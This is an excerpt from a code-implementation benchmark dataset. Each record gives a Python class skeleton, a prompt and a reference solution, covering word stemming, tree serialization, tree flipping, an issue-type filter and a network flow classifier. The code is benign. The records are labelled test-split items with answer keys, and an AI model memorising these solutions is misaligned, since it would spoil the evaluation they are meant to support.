word):\n \"\"\"Stems a word and updates the reverse lookup.\"\"\"\n <|body_0|>\n\n def original_form(cls, word):\n \"\"\"Returns original form of a word given the stemmed version, as stored in the word lookup.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class StemmingHelper:\n \"\"\"Class to aid the stemming process - from word to stemmed form, and vice versa. The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.\"\"\"\n\n def stem(cls, word):\n \"\"\"Stems a word and updates the reverse lookup.\"\"\"\n stemmed = global_stemmer.stem(word)\n if stemmed not in cls.word_lookup:\n cls.word_lookup[stemmed] = {}\n cls.word_lookup[stemmed][word] = cls.word_lookup[stemmed].get(word, 0) + 1\n return stemmed\n\n def original_form(cls, word):\n \"\"\"Returns original form of a word given the stemmed version, as stored in the word lookup.\"\"\"\n if word in cls.word_lookup:\n return max(cls.word_lookup[word].keys(), key=lambda x: cls.word_lookup[word][x])\n else:\n return word\n", "source": "the_stack_v2_python_sparse", "source_path": "Programming/python/word2vec/word2vec_utitlity.py", "source_repo": "PythEsc/Research_project2", "split": "test", "star_events_count": 2} {"blob_id": "0aa06497395ee14ed1746e725d2607b987ead4e7", "bodies": ["if root is None:\n return []\nqueue = deque([root])\nans = []\nans.append(['#', root.val])\nwhile queue:\n node = queue.popleft()\n child_list = []\n for child in node.children:\n child_list.append(child.val)\n queue.append(child)\n ans.append([node.val, child_list])\nreturn ans", "if len(data) == 0:\n return None\nroot_val = data.pop(0)[1]\nroot_node = Node(root_val, [])\nqueue = deque([root_node])\nwhile queue:\n node = queue.popleft()\n for child in data.pop(0)[1]:\n child_node = Node(child, [])\n node.children.append(child_node)\n queue.append(child_node)\nreturn root_node"], "bodies_text": "<|body_start_0|>\n if root is None:\n return []\n queue = deque([root])\n ans = []\n ans.append(['#', root.val])\n while queue:\n node = queue.popleft()\n child_list = []\n for child in node.children:\n child_list.append(child.val)\n queue.append(child)\n ans.append([node.val, child_list])\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return None\n root_val = data.pop(0)[1]\n root_node = Node(root_val, [])\n queue = deque([root_node])\n while queue:\n node = queue.popleft()\n for child in data.pop(0)[1]:\n child_node = Node(child, [])\n node.children.append(child_node)\n queue.append(child_node)\n return root_node\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root is None:\n return []\n queue = deque([root])\n ans = []\n ans.append(['#', root.val])\n while queue:\n node = queue.popleft()\n child_list = []\n for child in node.children:\n child_list.append(child.val)\n queue.append(child)\n ans.append([node.val, child_list])\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return None\n root_val = data.pop(0)[1]\n root_node = Node(root_val, [])\n queue = deque([root_node])\n while queue:\n node = queue.popleft()\n for child in data.pop(0)[1]:\n child_node = Node(child, [])\n node.children.append(child_node)\n queue.append(child_node)\n return root_node\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000281", "length_bytes": 1523, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: Node :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: Node", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000366", "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: Node", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: Node\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root is None:\n return []\n queue = deque([root])\n ans = []\n ans.append(['#', root.val])\n while queue:\n node = queue.popleft()\n child_list = []\n for child in node.children:\n child_list.append(child.val)\n queue.append(child)\n ans.append([node.val, child_list])\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return None\n root_val = data.pop(0)[1]\n root_node = Node(root_val, [])\n queue = deque([root_node])\n while queue:\n node = queue.popleft()\n for child in data.pop(0)[1]:\n child_node = Node(child, [])\n node.children.append(child_node)\n queue.append(child_node)\n return root_node\n<|end_body_1|>\n", "revision_id": "5e09a5d36ac55d782628a888ad57d48e234b61ac", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n if root is None:\n return []\n queue = deque([root])\n ans = []\n ans.append(['#', root.val])\n while queue:\n node = queue.popleft()\n child_list = []\n for child in node.children:\n child_list.append(child.val)\n queue.append(child)\n ans.append([node.val, child_list])\n return ans\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n if len(data) == 0:\n return None\n root_val = data.pop(0)[1]\n root_node = Node(root_val, [])\n queue = deque([root_node])\n while queue:\n node = queue.popleft()\n for child in data.pop(0)[1]:\n child_node = Node(child, [])\n node.children.append(child_node)\n queue.append(child_node)\n return root_node\n", "source": "the_stack_v2_python_sparse", "source_path": "428/428.py", "source_repo": "sjzyjc/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "a028872377265846d63fac2fd6d365c5191f4326", "bodies": ["if not root or not root.left:\n return root\nleft, right = (root.left, root.right)\nnew_root = self.upsideDownBinaryTree(left)\nleft.left, left.right = (right, root)\nroot.left, root.right = (None, None)\nreturn new_root", "p, parent, parent_right = (root, None, None)\nwhile p:\n left = p.left\n p.left = parent_right\n parent_right = p.right\n p.right = parent\n parent = p\n p = left\nreturn parent"], "bodies_text": "<|body_start_0|>\n if not root or not root.left:\n return root\n left, right = (root.left, root.right)\n new_root = self.upsideDownBinaryTree(left)\n left.left, left.right = (right, root)\n root.left, root.right = (None, None)\n return new_root\n<|end_body_0|>\n\n<|body_start_1|>\n p, parent, parent_right = (root, None, None)\n while p:\n left = p.left\n p.left = parent_right\n parent_right = p.right\n p.right = parent\n parent = p\n p = left\n return parent\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def upsideDownBinaryTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_0|>\n\n def upsideDownBinaryTree_iterative(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root or not root.left:\n return root\n left, right = (root.left, root.right)\n new_root = self.upsideDownBinaryTree(left)\n left.left, left.right = (right, root)\n root.left, root.right = (None, None)\n return new_root\n<|end_body_0|>\n\n<|body_start_1|>\n p, parent, parent_right = (root, None, None)\n while p:\n left = p.left\n p.left = parent_right\n parent_right = p.right\n p.right = parent\n parent = p\n p = left\n return parent\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000282", "length_bytes": 2305, "license_type": "no_license", "methods": [{"docstring": ":type root: TreeNode :rtype: TreeNode", "name": "upsideDownBinaryTree", "signature": "def upsideDownBinaryTree(self, root)"}, {"docstring": ":type root: TreeNode :rtype: TreeNode", "name": "upsideDownBinaryTree_iterative", "signature": "def upsideDownBinaryTree_iterative(self, root)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def upsideDownBinaryTree(self, root): :type root: TreeNode :rtype: TreeNode\n- def upsideDownBinaryTree_iterative(self, root): :type root: TreeNode :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def upsideDownBinaryTree(self, root): :type root: TreeNode :rtype: TreeNode\n- def upsideDownBinaryTree_iterative(self, root): :type root: TreeNode :rtype: TreeNode\n\n<|skeleton|>\nclass Solution:\n\n def upsideDownBinaryTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_0|>\n\n def upsideDownBinaryTree_iterative(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root or not root.left:\n return root\n left, right = (root.left, root.right)\n new_root = self.upsideDownBinaryTree(left)\n left.left, left.right = (right, root)\n root.left, root.right = (None, None)\n return new_root\n<|end_body_0|>\n\n<|body_start_1|>\n p, parent, parent_right = (root, None, None)\n while p:\n left = p.left\n p.left = parent_right\n parent_right = p.right\n p.right = parent\n parent = p\n p = left\n return parent\n<|end_body_1|>\n", "revision_id": "e60ba45fe2f2e5e3b3abfecec3db76f5ce1fde59", "skeleton": "<|skeleton|>\nclass Solution:\n\n def upsideDownBinaryTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_0|>\n\n def upsideDownBinaryTree_iterative(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def upsideDownBinaryTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n if not root or not root.left:\n return root\n left, right = (root.left, root.right)\n new_root = self.upsideDownBinaryTree(left)\n left.left, left.right = (right, root)\n root.left, root.right = (None, None)\n return new_root\n\n def upsideDownBinaryTree_iterative(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n p, parent, parent_right = (root, None, None)\n while p:\n left = p.left\n p.left = parent_right\n parent_right = p.right\n p.right = parent\n parent = p\n p = left\n return parent\n", "source": "the_stack_v2_python_sparse", "source_path": "src/lt_156.py", "source_repo": "oxhead/CodingYourWay", "split": "test", "star_events_count": 0} {"blob_id": "597a3541def82f6f1257622801f39c914c930aa9", "bodies": ["if config_string and (not config_string.startswith('+')) and (not config_string.startswith('-')):\n self._include_by_default = False\nelif config_string:\n config_string = IssueTypeConfig.DEFAULT_FILTER + ',' + config_string\n self._include_by_default = True\nelse:\n config_string = IssueTypeConfig.DEFAULT_FILTER\n self._include_by_default = True\nself.config_string = config_string\nissue_types = config_string.split(',')\nself.klasses = []\nfor issue_type in issue_types:\n if not issue_type:\n continue\n if issue_type.startswith('-'):\n want_this_issue_type = False\n issue_type = issue_type[1:]\n elif issue_type.startswith('+'):\n want_this_issue_type = True\n issue_type = issue_type[1:]\n else:\n want_this_issue_type = True\n try:\n klass = ISSUE_TYPES[issue_type]\n self.klasses.append((klass, want_this_issue_type))\n except KeyError:\n print('Issue type filter: unknown issue type: %s' % issue_type, file=sys.stderr)", "sorted_issue_types = [cls for _, cls in sorted(issue_types.items(), key=itemgetter(0))]\nif not self._include_by_default:\n source_list = []\n for cls, _ in self.klasses:\n for issue_type in sorted_issue_types:\n if (issue_type == cls or issubclass(issue_type, cls)) and (not issue_type in source_list):\n source_list.append(issue_type)\nelse:\n source_list = sorted_issue_types\nret = []\nfor klass_a in source_list:\n want_this_class = self._include_by_default\n for klass_b, want_this_issue_type in self.klasses:\n if klass_a == klass_b or issubclass(klass_a, klass_b):\n want_this_class = want_this_issue_type\n if want_this_class:\n ret.append(klass_a)\nreturn ret", "want_this_issue = self._include_by_default\nfor klass, want_this_issue_type in self.klasses:\n if isinstance(issue, klass):\n want_this_issue = want_this_issue_type\nreturn want_this_issue"], "bodies_text": "<|body_start_0|>\n if config_string and (not config_string.startswith('+')) and (not config_string.startswith('-')):\n self._include_by_default = False\n elif config_string:\n config_string = IssueTypeConfig.DEFAULT_FILTER + ',' + config_string\n self._include_by_default = True\n else:\n config_string = IssueTypeConfig.DEFAULT_FILTER\n self._include_by_default = True\n self.config_string = config_string\n issue_types = config_string.split(',')\n self.klasses = []\n for issue_type in issue_types:\n if not issue_type:\n continue\n if issue_type.startswith('-'):\n want_this_issue_type = False\n issue_type = issue_type[1:]\n elif issue_type.startswith('+'):\n want_this_issue_type = True\n issue_type = issue_type[1:]\n else:\n want_this_issue_type = True\n try:\n klass = ISSUE_TYPES[issue_type]\n self.klasses.append((klass, want_this_issue_type))\n except KeyError:\n print('Issue type filter: unknown issue type: %s' % issue_type, file=sys.stderr)\n<|end_body_0|>\n\n<|body_start_1|>\n sorted_issue_types = [cls for _, cls in sorted(issue_types.items(), key=itemgetter(0))]\n if not self._include_by_default:\n source_list = []\n for cls, _ in self.klasses:\n for issue_type in sorted_issue_types:\n if (issue_type == cls or issubclass(issue_type, cls)) and (not issue_type in source_list):\n source_list.append(issue_type)\n else:\n source_list = sorted_issue_types\n ret = []\n for klass_a in source_list:\n want_this_class = self._include_by_default\n for klass_b, want_this_issue_type in self.klasses:\n if klass_a == klass_b or issubclass(klass_a, klass_b):\n want_this_class = want_this_issue_type\n if want_this_class:\n ret.append(klass_a)\n return ret\n<|end_body_1|>\n\n<|body_start_2|>\n want_this_issue = self._include_by_default\n for klass, want_this_issue_type in self.klasses:\n if isinstance(issue, klass):\n want_this_issue = want_this_issue_type\n return want_this_issue\n<|end_body_2|>\n", "class_docstring": "Issue type filter configuration", "class_name": "IssueTypeConfig", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass IssueTypeConfig:\n \"\"\"Issue type filter configuration\"\"\"\n\n def __init__(self, config_string=None):\n \"\"\"Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.\"\"\"\n <|body_0|>\n\n def filter_issue_types(self, issue_types):\n \"\"\"Filters the given dictionary of issue types. This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.\"\"\"\n <|body_1|>\n\n def include_issue_p(self, issue):\n \"\"\"Return whether this issue is wanted or not according to the issue type filter configuration.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if config_string and (not config_string.startswith('+')) and (not config_string.startswith('-')):\n self._include_by_default = False\n elif config_string:\n config_string = IssueTypeConfig.DEFAULT_FILTER + ',' + config_string\n self._include_by_default = True\n else:\n config_string = IssueTypeConfig.DEFAULT_FILTER\n self._include_by_default = True\n self.config_string = config_string\n issue_types = config_string.split(',')\n self.klasses = []\n for issue_type in issue_types:\n if not issue_type:\n continue\n if issue_type.startswith('-'):\n want_this_issue_type = False\n issue_type = issue_type[1:]\n elif issue_type.startswith('+'):\n want_this_issue_type = True\n issue_type = issue_type[1:]\n else:\n want_this_issue_type = True\n try:\n klass = ISSUE_TYPES[issue_type]\n self.klasses.append((klass, want_this_issue_type))\n except KeyError:\n print('Issue type filter: unknown issue type: %s' % issue_type, file=sys.stderr)\n<|end_body_0|>\n\n<|body_start_1|>\n sorted_issue_types = [cls for _, cls in sorted(issue_types.items(), key=itemgetter(0))]\n if not self._include_by_default:\n source_list = []\n for cls, _ in self.klasses:\n for issue_type in sorted_issue_types:\n if (issue_type == cls or issubclass(issue_type, cls)) and (not issue_type in source_list):\n source_list.append(issue_type)\n else:\n source_list = sorted_issue_types\n ret = []\n for klass_a in source_list:\n want_this_class = self._include_by_default\n for klass_b, want_this_issue_type in self.klasses:\n if klass_a == klass_b or issubclass(klass_a, klass_b):\n want_this_class = want_this_issue_type\n if want_this_class:\n ret.append(klass_a)\n return ret\n<|end_body_1|>\n\n<|body_start_2|>\n want_this_issue = self._include_by_default\n for klass, want_this_issue_type in self.klasses:\n if isinstance(issue, klass):\n want_this_issue = want_this_issue_type\n return want_this_issue\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000283", "length_bytes": 5182, "license_type": "permissive", "methods": [{"docstring": "Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.", "name": "__init__", "signature": "def __init__(self, config_string=None)"}, {"docstring": "Filters the given dictionary of issue types. This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.", "name": "filter_issue_types", "signature": "def filter_issue_types(self, issue_types)"}, {"docstring": "Return whether this issue is wanted or not according to the issue type filter configuration.", "name": "include_issue_p", "signature": "def include_issue_p(self, issue)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000627", "prompt": "Implement the Python class `IssueTypeConfig` described below.\n\nClass description:\nIssue type filter configuration\n\nMethod signatures and docstrings:\n- def __init__(self, config_string=None): Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.\n- def filter_issue_types(self, issue_types): Filters the given dictionary of issue types. This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.\n- def include_issue_p(self, issue): Return whether this issue is wanted or not according to the issue type filter configuration.", "prompted_full_text": "Implement the Python class `IssueTypeConfig` described below.\n\nClass description:\nIssue type filter configuration\n\nMethod signatures and docstrings:\n- def __init__(self, config_string=None): Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.\n- def filter_issue_types(self, issue_types): Filters the given dictionary of issue types. This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.\n- def include_issue_p(self, issue): Return whether this issue is wanted or not according to the issue type filter configuration.\n\n<|skeleton|>\nclass IssueTypeConfig:\n \"\"\"Issue type filter configuration\"\"\"\n\n def __init__(self, config_string=None):\n \"\"\"Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.\"\"\"\n <|body_0|>\n\n def filter_issue_types(self, issue_types):\n \"\"\"Filters the given dictionary of issue types. This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.\"\"\"\n <|body_1|>\n\n def include_issue_p(self, issue):\n \"\"\"Return whether this issue is wanted or not according to the issue type filter configuration.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if config_string and (not config_string.startswith('+')) and (not config_string.startswith('-')):\n self._include_by_default = False\n elif config_string:\n config_string = IssueTypeConfig.DEFAULT_FILTER + ',' + config_string\n self._include_by_default = True\n else:\n config_string = IssueTypeConfig.DEFAULT_FILTER\n self._include_by_default = True\n self.config_string = config_string\n issue_types = config_string.split(',')\n self.klasses = []\n for issue_type in issue_types:\n if not issue_type:\n continue\n if issue_type.startswith('-'):\n want_this_issue_type = False\n issue_type = issue_type[1:]\n elif issue_type.startswith('+'):\n want_this_issue_type = True\n issue_type = issue_type[1:]\n else:\n want_this_issue_type = True\n try:\n klass = ISSUE_TYPES[issue_type]\n self.klasses.append((klass, want_this_issue_type))\n except KeyError:\n print('Issue type filter: unknown issue type: %s' % issue_type, file=sys.stderr)\n<|end_body_0|>\n\n<|body_start_1|>\n sorted_issue_types = [cls for _, cls in sorted(issue_types.items(), key=itemgetter(0))]\n if not self._include_by_default:\n source_list = []\n for cls, _ in self.klasses:\n for issue_type in sorted_issue_types:\n if (issue_type == cls or issubclass(issue_type, cls)) and (not issue_type in source_list):\n source_list.append(issue_type)\n else:\n source_list = sorted_issue_types\n ret = []\n for klass_a in source_list:\n want_this_class = self._include_by_default\n for klass_b, want_this_issue_type in self.klasses:\n if klass_a == klass_b or issubclass(klass_a, klass_b):\n want_this_class = want_this_issue_type\n if want_this_class:\n ret.append(klass_a)\n return ret\n<|end_body_1|>\n\n<|body_start_2|>\n want_this_issue = self._include_by_default\n for klass, want_this_issue_type in self.klasses:\n if isinstance(issue, klass):\n want_this_issue = want_this_issue_type\n return want_this_issue\n<|end_body_2|>\n", "revision_id": "c21567d7ecb56da5ee24d56a0dee7776818512dc", "skeleton": "<|skeleton|>\nclass IssueTypeConfig:\n \"\"\"Issue type filter configuration\"\"\"\n\n def __init__(self, config_string=None):\n \"\"\"Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.\"\"\"\n <|body_0|>\n\n def filter_issue_types(self, issue_types):\n \"\"\"Filters the given dictionary of issue types. This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.\"\"\"\n <|body_1|>\n\n def include_issue_p(self, issue):\n \"\"\"Return whether this issue is wanted or not according to the issue type filter configuration.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class IssueTypeConfig:\n \"\"\"Issue type filter configuration\"\"\"\n\n def __init__(self, config_string=None):\n \"\"\"Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.\"\"\"\n if config_string and (not config_string.startswith('+')) and (not config_string.startswith('-')):\n self._include_by_default = False\n elif config_string:\n config_string = IssueTypeConfig.DEFAULT_FILTER + ',' + config_string\n self._include_by_default = True\n else:\n config_string = IssueTypeConfig.DEFAULT_FILTER\n self._include_by_default = True\n self.config_string = config_string\n issue_types = config_string.split(',')\n self.klasses = []\n for issue_type in issue_types:\n if not issue_type:\n continue\n if issue_type.startswith('-'):\n want_this_issue_type = False\n issue_type = issue_type[1:]\n elif issue_type.startswith('+'):\n want_this_issue_type = True\n issue_type = issue_type[1:]\n else:\n want_this_issue_type = True\n try:\n klass = ISSUE_TYPES[issue_type]\n self.klasses.append((klass, want_this_issue_type))\n except KeyError:\n print('Issue type filter: unknown issue type: %s' % issue_type, file=sys.stderr)\n\n def filter_issue_types(self, issue_types):\n \"\"\"Filters the given dictionary of issue types. This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.\"\"\"\n sorted_issue_types = [cls for _, cls in sorted(issue_types.items(), key=itemgetter(0))]\n if not self._include_by_default:\n source_list = []\n for cls, _ in self.klasses:\n for issue_type in sorted_issue_types:\n if (issue_type == cls or issubclass(issue_type, cls)) and (not issue_type in source_list):\n source_list.append(issue_type)\n else:\n source_list = sorted_issue_types\n ret = []\n for klass_a in source_list:\n want_this_class = self._include_by_default\n for klass_b, want_this_issue_type in self.klasses:\n if klass_a == klass_b or issubclass(klass_a, klass_b):\n want_this_class = want_this_issue_type\n if want_this_class:\n ret.append(klass_a)\n return ret\n\n def include_issue_p(self, issue):\n \"\"\"Return whether this issue is wanted or not according to the issue type filter configuration.\"\"\"\n want_this_issue = self._include_by_default\n for klass, want_this_issue_type in self.klasses:\n if isinstance(issue, klass):\n want_this_issue = want_this_issue_type\n return want_this_issue\n", "source": "the_stack_v2_python_sparse", "source_path": "src/advisor/issue_type_config.py", "source_repo": "arm-hpc/porting-advisor", "split": "test", "star_events_count": 15} {"blob_id": "5a835443cd21a6f169a9dd6c125659a8acc8016b", "bodies": ["if self.source_port is not None:\n return self.source_port.is_local\nreturn True", "if self.dest_port is not None:\n return self.dest_port.is_local\nreturn True", "super(FlowClassifier, self).validate()\nif self.source_port is None and self.dest_port is None:\n raise errors.ValidationError('One of source_port or dest_port must be set')\nelif self.source_port is not None and self.dest_port is not None:\n raise errors.ValidationError('source_port and dest_port cannot be both set')"], "bodies_text": "<|body_start_0|>\n if self.source_port is not None:\n return self.source_port.is_local\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if self.dest_port is not None:\n return self.dest_port.is_local\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n super(FlowClassifier, self).validate()\n if self.source_port is None and self.dest_port is None:\n raise errors.ValidationError('One of source_port or dest_port must be set')\n elif self.source_port is not None and self.dest_port is not None:\n raise errors.ValidationError('source_port and dest_port cannot be both set')\n<|end_body_2|>\n", "class_docstring": "", "class_name": "FlowClassifier", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FlowClassifier:\n\n def is_classification_local(self):\n \"\"\"Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. For classification on dest lport, we match using reg7. reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.\"\"\"\n <|body_0|>\n\n def is_dispatch_local(self):\n \"\"\"Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. The has to be done on the destination host because the mark gets lost in transit.\"\"\"\n <|body_1|>\n\n def validate(self):\n \"\"\"Make sure exactly one of {source_port, dest_port} is set\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.source_port is not None:\n return self.source_port.is_local\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if self.dest_port is not None:\n return self.dest_port.is_local\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n super(FlowClassifier, self).validate()\n if self.source_port is None and self.dest_port is None:\n raise errors.ValidationError('One of source_port or dest_port must be set')\n elif self.source_port is not None and self.dest_port is not None:\n raise errors.ValidationError('source_port and dest_port cannot be both set')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000284", "length_bytes": 5427, "license_type": "permissive", "methods": [{"docstring": "Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. For classification on dest lport, we match using reg7. reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of 